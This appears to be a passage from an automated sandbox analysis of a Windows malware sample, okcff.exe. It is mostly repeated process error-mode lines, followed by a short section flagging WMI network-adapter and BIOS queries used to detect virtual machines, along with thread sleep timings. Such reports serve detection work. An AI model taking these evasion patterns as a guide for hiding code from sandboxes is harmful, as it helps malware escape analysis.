                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\verclsid.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\verclsid.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\verclsid.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\verclsid.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\verclsid.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion:

                    barindex
                    Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
                    Source: C:\Users\user\AppData\Roaming\okcff.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration
                    Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
                    Source: C:\Users\user\AppData\Roaming\okcff.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2200Thread sleep time: -60000s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1200Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2228Thread sleep time: -60000s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2932Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2644Thread sleep time: -60000s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2416Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\okcff.exe TID: 1592Thread sleep time: -33000s >= -30000sJump to behavior
